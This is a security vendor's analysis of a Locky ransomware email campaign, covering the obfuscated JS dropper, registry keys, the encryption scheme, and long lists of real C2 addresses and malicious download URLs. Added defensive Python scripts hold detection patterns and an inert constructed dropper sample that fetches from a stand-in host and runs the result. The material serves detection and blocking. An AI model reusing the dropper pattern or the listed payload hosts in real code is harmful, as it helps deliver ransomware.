Since February, the 360 Threat Intelligence Center has been tracking a large wave of ransomware. Organisations in China have come under attack one after another, with companies' externally facing mailboxes receiving large numbers of emails carrying malicious attachments like the one below.

The email body reads roughly as follows:

If an employee carelessly opens the malicious attachment, the malware connects out to a server to download its components, encrypts the important files on the system and demands payment from the user for decryption.
The email attachment is an archive containing nothing but two JS scripts:
The JS is obfuscated. Analysis shows that when the victim double-clicks the script (which runs it under the Windows Script Host), it creates an MSXML2.XMLHTTP object to download the executable from http://vaseline-amar-ujala.in/euwiyr4hdc and then launches the Locky main process through the run method of a WScript.Shell object:
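The delivery pattern above (a ZIP whose only members are script files combining an XMLHTTP download with a WScript.Shell run call) is easy to screen for at a mail gateway before any user can double-click it. The following is an added example, not code from the original 360 write-up: the ZIP and the inert JScript bodies inside it are constructed here for illustration (they contact nothing and use an `example.invalid` URL), and the heuristic is deliberately broader than the single sample described, also matching MSXML2.ServerXMLHTTP and WinHttp.WinHttpRequest downloaders and Shell.Application launchers, and joining split string literals such as `"MSX" + "ML2.XMLHTTP"` before matching.

```python
"""Added example: gateway-style triage of a ZIP attachment for the
script-dropper pattern (download via XMLHTTP + launch via WScript.Shell).
Sample JS bodies and the ZIP are constructed, inert stand-ins."""
import io
import re
import zipfile

# Either family of API alone is common in legitimate scripts; the combination
# inside a mail attachment made only of scripts is the signal.
DOWNLOAD_APIS = re.compile(r"MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest", re.I)
EXEC_APIS = re.compile(r"WScript\.Shell|Shell\.Application", re.I)
RUN_CALL = re.compile(r"\.(Run|ShellExecute|Exec)\s*\(", re.I)
SCRIPT_EXTS = (".js", ".jse", ".wsf", ".vbs", ".vbe", ".hta")

# Obfuscators split strings: "MSX" + "ML2.XML" + "HTTP". Remove the
# quote-plus-quote seams so the joined literal is visible to the regexes.
SPLIT_SEAM = re.compile(r"[\"']\s*\+\s*[\"']")


def analyse_zip(data: bytes) -> dict:
    """Return a verdict for one ZIP attachment.

    verdict is 'block' when every member is a script and at least one shows
    the download+execute combination, 'quarantine' when only one of those
    holds, 'allow' otherwise, 'not-a-zip' when the bytes are not a ZIP."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return {"valid_zip": False, "verdict": "not-a-zip"}
    members = [m for m in zf.infolist() if not m.is_dir()]
    names = [m.filename for m in members]
    all_scripts = bool(names) and all(n.lower().endswith(SCRIPT_EXTS) for n in names)
    suspicious = []
    for m in members:
        body = zf.read(m).decode("utf-8", errors="ignore")
        joined = SPLIT_SEAM.sub("", body)
        if DOWNLOAD_APIS.search(joined) and EXEC_APIS.search(joined) and RUN_CALL.search(joined):
            suspicious.append(m.filename)
    if all_scripts and suspicious:
        verdict = "block"
    elif all_scripts or suspicious:
        verdict = "quarantine"
    else:
        verdict = "allow"
    return {"valid_zip": True, "members": names, "all_scripts": all_scripts,
            "suspicious": suspicious, "verdict": verdict}


def build_sample_zip() -> bytes:
    """Constructed sample shaped like the observed attachment: two .js members
    whose (inert) bodies use split strings to hide the COM ProgIDs."""
    dropper = (
        'var h = new ActiveXObject("MSX" + "ML2.XML" + "HTTP");\n'
        'h.open("GET", "http://example.invalid/payload", false);\n'
        'h.send();\n'
        'var s = new ActiveXObject("WScr" + "ipt.Shell");\n'
        's.Run("%TEMP%\\\\a.exe");\n'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice_3920.js", dropper)
        zf.writestr("details.js", dropper)
    return buf.getvalue()


def build_benign_zip() -> bytes:
    """Constructed control: a ZIP holding a single non-script document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4 benign placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    print(analyse_zip(build_sample_zip()))
    print(analyse_zip(build_benign_zip()))
```

The seam-joining step matters more than the API list: the real droppers are obfuscated, and a regex run over the raw body would miss a ProgID assembled from three literals. An `all_scripts` archive with no API hit is still quarantined rather than allowed, since a script-only attachment from outside the organisation has no normal business use.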
The downloaded exe is heavily obfuscated:
Once started, the process writes the machine ID to HKEY_CURRENT_USER\Software\Locky\id and the public key it will use for encryption to HKEY_CURRENT_USER\Software\Locky\pubkey:
The trojan then walks the file system looking for files with extensions such as .xls, .ppt, .doc, .wb2, .jpg and .wav, encrypts each one and renames it to <id><hash>.locky (file contents are encrypted with a per-file symmetric key that is in turn wrapped with the RSA public key stored in the registry, so nothing can be recovered without the attacker's private key), and drops a recovery-instructions document into every directory in which it found documents:
When encryption is complete it sets HKEY_CURRENT_USER\Software\Locky\completed to 1 and reports to the server in an encrypted message:
A partial list of the C2 addresses follows. Note that all of them are plain HTTP requests to main.php on bare IP addresses with no domain name involved, which is itself a useful proxy-log alert condition:
http://78.40.108.39/main.php
http://51.255.107.8/main.php
http://51.255.107.10/main.php
http://51.254.181.122/main.php
http://195.64.154.114/main.php
http://188.127.231.116/main.php
http://149.202.109.205/main.php
Finally it sets the desktop wallpaper to the recovery-instructions image, opens the recovery-instructions document, and waits for the victim to pay the ransom:
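The three artefact classes described above (the HKCU\Software\Locky registry values, the <id><hash>.locky file naming, and beaconing to main.php on the listed IP addresses) together make a compact host-and-network triage check. The script below is an added example, not part of the original 360 write-up. It runs over constructed sample file paths and proxy log lines so it works offline; the proxy log format is an assumption of this example, the split of the 32-hex-character .locky name into a 16-character victim id followed by 16 characters of per-file hash follows the <id><hash> description above, and the registry read is attempted only on Windows (elsewhere it reports "skipped").

```python
"""Added example: triage for Locky artefacts over constructed inputs.
Checks .locky file naming, C2 beacons to the listed main.php hosts, and
(Windows only) the HKCU\\Software\\Locky registry values."""
import re
import sys
from urllib.parse import urlsplit

# C2 list from the write-up: plain HTTP to main.php on bare IP addresses.
C2_URLS = [
    "http://78.40.108.39/main.php",
    "http://51.255.107.8/main.php",
    "http://51.255.107.10/main.php",
    "http://51.254.181.122/main.php",
    "http://195.64.154.114/main.php",
    "http://188.127.231.116/main.php",
    "http://149.202.109.205/main.php",
]
C2_HOSTS = {urlsplit(u).hostname for u in C2_URLS}

# <id><hash>.locky: 16 hex chars of victim id (the value also stored in
# HKCU\Software\Locky\id) followed by 16 hex chars per file.
LOCKY_NAME = re.compile(r"^([0-9A-F]{16})([0-9A-F]{16})\.locky$", re.I)

# Constructed sample inputs (not real victim data).
SAMPLE_FILES = [
    r"C:\Users\alice\Documents\0123456789ABCDEFFEDCBA9876543210.locky",
    r"C:\Users\alice\Documents\0123456789ABCDEF00112233445566AA.locky",
    r"C:\Users\alice\Documents\budget.xls",
    r"C:\Users\alice\Pictures\notlocky.locky",       # wrong shape: ignored
]
# Assumed proxy log layout: "<ts> <src_ip> <method> <url> <status>".
SAMPLE_PROXY = [
    "2016-03-02T09:14:03Z 10.0.5.17 POST http://78.40.108.39/main.php 200",
    "2016-03-02T09:14:05Z 10.0.5.17 GET http://www.example.com/index.html 200",
    "2016-03-02T09:15:11Z 10.0.5.22 POST http://51.255.107.10/main.php 200",
    "2016-03-02T09:15:30Z 10.0.5.30 GET http://78.40.108.39/robots.txt 404",
]


def find_locky_files(paths):
    """Return (path, victim_id) for every name matching the .locky scheme."""
    hits = []
    for p in paths:
        name = p.replace("\\", "/").rsplit("/", 1)[-1]
        m = LOCKY_NAME.match(name)
        if m:
            hits.append((p, m.group(1).upper()))
    return hits


def find_c2_beacons(proxy_lines):
    """Return (src_ip, url) for requests to /main.php on a known C2 host."""
    hits = []
    for line in proxy_lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        url = parts[3]
        u = urlsplit(url)
        if u.hostname in C2_HOSTS and u.path == "/main.php":
            hits.append((parts[1], url))
    return hits


def read_locky_registry():
    """Read HKCU\\Software\\Locky\\{id,pubkey,completed} on Windows; the
    pubkey value is summarised by length rather than dumped."""
    if sys.platform != "win32":
        return {"status": "skipped"}
    import winreg
    try:
        key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Locky")
    except OSError:
        return {"status": "absent"}
    out = {"status": "present"}
    for name in ("id", "pubkey", "completed"):
        try:
            value, _ = winreg.QueryValueEx(key, name)
            out[name] = f"<{len(value)} bytes>" if name == "pubkey" else value
        except OSError:
            out[name] = None
    return out


def assess(paths, proxy_lines):
    """Combine the three checks into one summary dict."""
    files = find_locky_files(paths)
    beacons = find_c2_beacons(proxy_lines)
    return {
        "encrypted_files": len(files),
        "victim_ids": sorted({vid for _, vid in files}),
        "beaconing_hosts": sorted({src for src, _ in beacons}),
        "registry": read_locky_registry(),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_FILES, SAMPLE_PROXY))
```

Two design points: the beacon check keys on host plus the exact /main.php path, so the unrelated request to robots.txt on a listed IP is not counted, and the file check extracts the victim id so that files from one infected machine can be grouped even when they are spread over network shares.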
According to 360 Threat Intelligence Center data, more than ten thousand users have been confirmed infected since March, and services offering to pay the ransom and obtain decryption on victims' behalf have even appeared on Taobao. Users are advised not to open emails of unknown origin; 360 Safeguard (360安全卫士) is continuously detecting and removing this ransomware.
Most of the downloader servers on which the attackers host their malicious code are compromised legitimate sites. A partial list follows; please block these at boundary devices.
http://1.casino-engine.ru/engine/core/76tr5rguinml.exe
http://1.casino-engine.ru/modules/images/87yhb54cdfy.exe
http://111.208.4.230:82/1Q2W3E4R5T6Y7U8I9O0P1Z2X3C4V5B/saigonnew.com.vn/system/logs/76tr5rguinml.exe
http://120.52.72.52/biosoftbelgium.com/c3pr90ntcsf0/system/logs/76tr5rguinml.exe
http://120.52.72.57/thuanhshop.com/c3pr90ntcsf0/system/logs/4trf3g45.exe
http://178.33.176.229/ber.exe
http://2.casino-engine.ru/img/multigaminator/4trf3g45.exe
http://50.28.211.199/hdd0/89o8i76u5y4
http://51457642.de.strato-hosting.eu/980k7j6h5
http://academiasuperior.net/wp-includes/rest-api/5h45hg4b
http://accessinvestment.net/4/0vexw3s5
http://aexpress.co/system/logs/086tg7
http://aimsande.com/87yg756f5.exe
http://aksci.net/system/logs/98yhb764d.exe
http://alexkote.ru/wp-content/plugins/87tg7v645c.exe
http://alumaxgroup.in/87yg756f5.exe
http://anro.kiev.ua/vqmod/vqcache/4trf3g45.exe
http://aqarhits.com/system/logs/87tg7v645c.exe
http://ari-ev.com/system/logs/765uy453gt5
http://aroham.com/87yg756f5.exe
http://art-studia-sharm.com.ua/libraries/simplepie/765g473bf34
http://art-wiz.ru/wp-includes/SimplePie/7ygvtyvb7niim.exe
http://astralia.ro/08o76g445g
http://azshop24.com.vn/system/logs/87tg7v645c.exe
http://baiya.org/image/templates/7ygvtyvb7niim.exe
http://behrozan.ir/system/logs/7t6f65g.exe
http://beltshoesnmore.com/system/logs/87yhb54cdfy.exe
http://besttec-cg.com/89ok8jhg
http://bindulin.by/system/logs/7ygvtyvb7niim.exe
http://biomir.ajanslive.com/system/logs/78tgh76.exe
http://biosoftbelgium.com/system/logs/76tr5rguinml.exe
http://browardcountystore.com/system/cache/223
http://buyfuntees.com/system/logs/7t6f65g.exe
http://c001456.aaa.ididp.com/system/logs/87yg756f5.exe
http://casewerkz.demowebsite.net/system/logs/87yhb54cdfy.exe
http://cazasports.com/system/logs/uy78hn654e.exe
http://ccac3323.com.sapo.pt/0y7bf3r
http://cherryuk.co.uk/system/logs/uy78hn654e.exe
http://chinhuanoithat.com/system/logs/uy78hn654e.exe
http://clubxtoys.com/system/logs/lkj87h.exe
http://cocowashi.com/system/logs/76tr5rguinml.exe
http://creditwallet.net/87yg756f5.exe
http://croqqer.org/wp-content/uploads/5h45hg4b
http://cuagonhaviet.com.vn/system/logs/lkj87h.exe
http://cyberbuh.pp.ua/97kh65gh5
http://demo.essarinfotech.net/87yg756f5.exe
http://demo.rublemag.ru/system/logs/87yhb54cdfy.exe
http://demo2.master-pro.biz/modules/payments/76tr5rguinml.exe
http://demo2.master-pro.biz/plugins/markitup/4trf3g45.exe
http://dgcustomgraphics.com/system/logs/98yhb764d.exe
http://dolcevita-ykt.ru/system/logs/uy78hn654e.exe
http://dommediciny.ru/system/logs/76h5gf43wg54
http://donutes.33499.info/system/logs/87yhb54cdfy.exe
http://dropshipaanbod.nl/system/logs/uy78hn654e.exe
http://dsignshop.com.au/system/logs/87tg7v645c.exe
http://effone.com/js/playstation4.exe
http://eiadmeodeda.securalive.ca/8fjvimkel1/c987ah8j9ei1.php
http://e-journal.respati.ac.id/8y74hfb
http://electime.com/wp-content/themes/765g473bf34
http://elogistic.ir/wp-admin/network/87hg8n54
http://emotos.ru/admin/model/87yhb54cdfy.exe
http://escortbayan.xelionphonesystem.com/wp-content/plugins/hello123/89h8btyfde445.exe
http://estudiomatera.com.ar/763fdvf
http://fashion-girl.od.ua/catalog/controller/87hg8n54
http://fb7707vd.bget.ru/admin/language/4trf3g45.exe
http://fibrefamily.ru/system/logs/87tg7v645c.exe
http://fkaouane.free.fr/67uh54gb4
http://flaxxup.com/87yg756f5.exe
http://for-sale.pk/system/logs/87yhb54cdfy.exe
http://fortyseven.com.ar/system/logs/7t6f65g.exe
http://g200.qdesign.vn/system/logs/87yhb54cdfy.exe
http://galit-law.co.il/32tguynjk
http://gargsons.com/87yg756f5.exe
http://giveitallhereqq.com/69.exe
http://giveitallhereqq.com/80.exe
http://giveitalltheresqq.com/69.exe
http://giveitalltheresqq.com/80.exe
http://gladilki.bohush.ru/system/library/a.exe
http://glslindia.com/87yg756f5.exe
http://gwentpressurewashers.com/system/logs/7ygvtyvb7niim.exe
http://heenaz.in/system/logs/98yhb764d.exe
http://hellomississmithqq.com/69.exe
http://hellomississmithqq.com/80.exe
http://het-havenhuis.nl/099oj6hg
http://hipnotixx.com/27h8n
http://hitronic.org/system/logs/76tr5rguinml.exe
http://hkhc-shop.lms.hk/system/logs/87yg7g
http://howisittomorrowff.com/69.exe
http://hppl.net/87yg756f5.exe
http://ihsanind.com/system/logs/87jhg44g5
http://imgointoeatnowcc.com/69.exe
http://imgointoeatnowcc.com/80.exe
http://imperiovintage.com.br/system/logs/76tr5rguinml.exe
http://indianexporthouse.eu/system/logs/uy78hn654e.exe
http://iperfume.co.il/system/logs/4trf3g45.exe
http://ipovareshka.ru/system/logs/76tr5rguinml.exe
http://italco.com.ua/system/logs/98yhb764d.exe
http://iwear.md/system/logs/7t6f65g.exe
http://izzy-cars.nl/9uj8n76b5.exe
http://jewellery.jagodesh.com/system/logs/iu8y7g6b
http://jldoptics.com/system/logs/87tg7v645c.exe
http://joecockerhereqq.com/69.exe
http://joecockerhereqq.com/80.exe
http://jorgecodas.com/76t2gr345
http://kiddyshop.kiev.ua/image/data/87tg7v645c.exe
http://kidtuning.ro/7r5fyf6
http://kievelectric.kiev.ua/art/media/87tg7v645c.exe
http://klariss.cz/87yg756f5.exe
http://kokoko.himegimi.jp/54g4
http://komplektik.com/system/logs/76tr5rguinml.exe
http://lahmar.choukri.perso.neuf.fr/78hg4wg
http://lampusorotmurah.com/system/logs/78tgh76.exe
http://lapdatcamerachatluongcao.com/system/logs/uy78hn654e.exe
http://leaderjewelleryco.com/admin/controller/87yhb54cdfy.exe
http://lhs-mhs.org/9uj8n76b5.exe
http://lightsroom.ru/system/logs/87tg7v645c.exe
http://liquor1.slvtechnologies.com/system/logs/7ygvtyvb7niim.exe
http://livewireradio.net/wp-admin/js/765g473bf34
http://magic-beauty.com.ua/system/logs/98yhb764d.exe
http://mail-dedmoroz.com.ua/adminka/templ/7ygvtyvb7niim.exe
http://mansolution.in.th/system/logs/7ygvtyvb7niim.exe
http://massage-himmel.de/978yhen2
http://maxbeauty.dp.ua/administrator/manifests/765g473bf34
http://maybridalsash.com/system/cache/111
http://mercadohiper.com.br/system/logs/uy78hn654e.exe
http://ministerepuissancejesus.com/o097jhg4g5
http://mobile-house.be/system/logs/98yhb764d.exe
http://myonlinedeals.pk/system/logs/43d5f67n8
http://myphampro.com/system/logs/87yhb54cdfy.exe
http://nagrobkipelplin.conceptreklamy.pl/modules/mod_wrapper/4trf3g45.exe
http://ncrweb.in/system/logs/7t6f65g.exe
http://newleaf.org.in/87yg756f5.exe
http://nguoitieudungthongthai.com/system/logs/987i6u5y4t
http://nhinh.com/system/logs/uy78hn654e.exe
http://nobilitas.cz/0954t4h45
http://nro.gov.sd/23r35y44y5
http://nypizza.ru/system/logs/7ygvtyvb7niim.exe
http://ohammam.fr/system/logs/23f3rf33.exe
http://ohbelleza.linkium.mx/system/logs/87yhb54cdfy.exe
http://ohellograndpaqq.com/69.exe
http://ohellograndpaqq.com/80.exe
http://ohelloguyff.com/70.exe
http://ohelloguyqq.com/70.exe
http://ohelloguyzzqq.com/85.exe
http://onsancompany.com/system/logs/uy78hn654e.exe
http://ozono.org.es/k7j6h5gf
http://pacificgiftcards.com/3/67t54cetvy
http://parturiencies3f9.besaba.com/76t2gr345
http://perfumy_alice.republika.pl/08h867g5
http://peterdickem.com/87745g
http://phatfx.net/98h8n23r23
http://phongsachviettech.com/system/logs/98yg7b
http://planetarchery.com.au/system/logs/q32r45g54
http://printisimo.ru/image/cache/7ygvtyvb7niim.exe
http://ptunited.net/system/logs/87tg7v645c.exe
http://pugmahons.com/~pugmahons/56er5f6g7b
http://realvacantcolony.tradersnetwork.co/97adguwod/08h13rfi982y.php
http://regentsanctionbisexual.isupplementscanada.com/97adguwod/08h13rfi982y.php
http://rem.az/system/logs/lkj87h.exe
http://risetravel.net/wp-includes/theme-compat/765g473bf34
http://rmdszms.ro/2/87yv5cds
http://saabvolvo.com.ua/system/logs/7ygvtyvb7niim.exe
http://saachi.co/system/logs/43ghy8n
http://sabriduman.com/wp-content/plugins/hello123/89h8btyfde445.exe
http://saigonnew.com.vn/system/logs/76tr5rguinml.exe
http://sales-teleselling.eu.org/wp-includes/fonts/5h45hg4b
http://scorpyofilms.com/67j5h5h4
http://scs-smesi.ru/published/PD/87tg7v645c.exe
http://shapes.com.pk/system/logs/87tg7v645c.exe
http://shoescorner.gr/system/logs/76tr5rguinml.exe
http://shofukai.web.fc2.com/23rt54y56
http://shop.celiodent.com/system/cache/111
http://shopphpmvc.e-groups.vn/system/logs/lkj87h.exe
http://shopthoitrangphukien.com/system/logs/7ygvtyvb7niim.exe
http://sigmahardware.com.my/system/logs/7ygvtyvb7niim.exe
http://silvermarket.gr/system/logs/78tgh76.exe
http://sitemar.ro/5/92buyv5
http://sm1.by/vqmod/xml/76tr5rguinml.exe
http://smeja.de/i876jh556h
http://smokediscount.de/786u5h
http://snosto.com/wp-admin/includes/i75rg456
http://softcrk.com/system/logs/4trf3g45.exe
http://softworksbd.com/73tgbf334
http://solucionesdubai.com.ve/system/logs/uy78hn654e.exe
http://sribinayakelectricals.com/system/logs/78tgh76.exe
http://srv35613.ht-test.ru/storage/plugins/76tr5rguinml.exe
http://stalu.sk/43dfg7hy
http://stepsaweb.com/system/logs/uy78hn654e.exe
http://stopmeagency.free.fr/9uj8n76b5.exe
http://storageinbath.co.uk/78jh5h
http://store.suhaskhamkar.in/system/logs/78tgh76.exe
http://sub4.gustoitalia.ru/system/logs/87tg7v645c.exe
http://superiorelectricmotors.com/wp-content/plugins/hello123/89h8btyfde445.exe
http://supply-division.dk/system/logs/76tr5rguinml.exe
http://surfcash.7u.cz/0o9k7jh55
http://surgitek.co.uk/system/logs/98yt
http://surprise.co.in/system/logs/87tg7v645c.exe
http://svetluchok.com.ua/admin/images/7ygvtyvb7niim.exe
http://szkoleniasluzb.pl/67j5hg
http://tcpos.com.vn/system/logs/56y4g45gh45h
http://tekstil-world.ru/vqmod/install/7ygvtyvb7niim.exe
http://test.sharmx.com.ua/sdideep/87hg8n54
http://texfibre.eu/system/logs/87tg7v645c.exe
http://thaihost.biz/bestylethai.com/43t3gh4
http://theskcreativearts.com/45tg
http://thewhitemug.co.uk/system/logs/4trf3g45.exe
http://thietbianninhngocphuoc.com/system/logs/98yhb764d.exe
http://thietbicokhi.com.vn/system/logs/7ygvtyvb7niim.exe
http://thisisitsqq.com/69.exe
http://thisisitsqq.com/80.exe
http://thuanhshop.com/system/logs/4trf3g45.exe
http://tianshilive.ru/vqmod/xml/87yhb54cdfy.exe
http://tomkinshop.net/system/logs/87yhb54cdfy.exe
http://torgtehnik.ru/system/cache/.../1.exe
http://tracks4africa.li/43f
http://tradesolutions.me.uk/8i76
http://tramps-ike.gr/8i67uy4g
http://tratancuongthainguyen.com/v4v5g45hg.exe
http://trieugiatrang.net/image/cache/87yhb54cdfy.exe
http://trimchic.co.uk/system/logs/lkj87h.exe
http://tuning.com.mx/v4v5g45hg.exe
http://u1847.netangels.ru/system/smsgate/7ygvtyvb7niim.exe
http://ubermensch.altervista.org/system/logs/87yhb54cdfy.exe
http://vaanifashion.com/system/logs/uy78hn654e.exe
http://vacationinbath.co.uk/v4v5g45hg.exe
http://vacationinbath.com/v4v5g45hg.exe
http://valerieannefashions.co.uk/v4v5g45hg.exe
http://vartashakti.com/v4v5g45hg.exe
http://vfwuc.eu.org/wp-content/uploads/5h45hg4b
http://vgp3.vitebsk.by/6/98yh8bb
http://vikasartsjodhpur.com/v4v5g45hg.exe
http://vip-creme.de/v4v5g45hg.exe
http://vip-shape.de/v4v5g45hg.exe
http://vital4age.de/v4v5g45hg.exe
http://vital4age.eu/v4v5g45hg.exe
http://washitallawayff.com/69.exe
http://washitallawayff.com/80.exe
http://webmail.p55.be/v4v5g45hg.exe
http://wechselkur.de/v4v5g45hg.exe
http://whatskv.com/v4v5g45hg.exe
http://winjoytechnologies.com/v4v5g45hg.exe
http://wireless-sync.com/system/cache/111
http://workplace-communication.eu.org/wp-includes/pomo/5h45hg4b
http://www.aebnworld.com/98o7kj56h
http://www.aggiesaquariums.com.au/wp-includes/y78hiuok
http://www.almraah.com/wp-content/uploads/y78hiuok
http://www.avdanrenault.com/system/logs/4trf3g45.exe
http://www.dentiera-rotta.it/files/Fedex/fedex.exe
http://www.ekowen.sk/09y8j
http://www.findtube.gr/templates/atomic/js/111.exe
http://www.fotoleonia.it/files/sample.exe
http://www.freeadultcontent.us/98o7kj56h
http://www.freepussyshow.com/9oi654gh3
http://www.gruposdemediosrrr.com/9oi654gh3
http://www.gw-fs.co.uk/873y4g7bf3
http://www.houseman.cz/files/10003c.exe
http://www.istruiscus.it/7643grb
http://www.kidshealingcrohnsandcolitis.com/8y7hybigv
http://www.kidshealingcrohnsandcolitis.org/8y7hybigv
http://www.koinerestaurant.com/parallax/piatti/promt.exe
http://www.livegirlshow.com/8i5ju4g34
http://www.liveshowgirl.com/8i5ju4g34
http://www.momstav.com/087hg67
http://www.myxxxlinks.com/4ggh45yh45
http://www.myxxxlinks.com:20480/4ggh45yh45
http://www.nenitasthumbs.com/4ggh45yh45
http://www.nevjegydesign.hu/0k6j6n4h4
http://www.nevjegyportal.hu/0k6j6n4h4
http://www.notebooktable.ru/system/logs/7ygvtyvb7niim.exe
http://www.promumedical.com/system/logs/87tg7v645c.exe
http://www.silko.ir/k8j5h
http://www.souqaqonline.com/system/logs/87tg7v645c.exe
http://www.tech-filter.ru/system/logs/78tgh76.exe
http://www.toolsavenue.com/system/cache/87yhb54cdfy.exe
http://www.trasachthainguyen.com/0l9k7j6
http://www.tuttiesauriti.org/wp-content/plugins/hello123/89h8btyfde445.exe
http://www.vtipnetriko.cz/9oi86j5hg4
http://xn--80ahetikodul.xn--p1ai/system/logs/4trf3g45.exe
http://xn--b1afonddk2l.xn--p1ai/system/logs/7t6f65g.exe
http://yander.by/system/logs/uy78hn654e.exe
http://zarabotoknasayte.zz.mu/7/sh87hg5v4
This article was originally published by 360 Security Broadcast (360安全播报); please credit the source and this article's URL when reposting. Article URL: http://bobao.360.cn/learning/detail/2804.html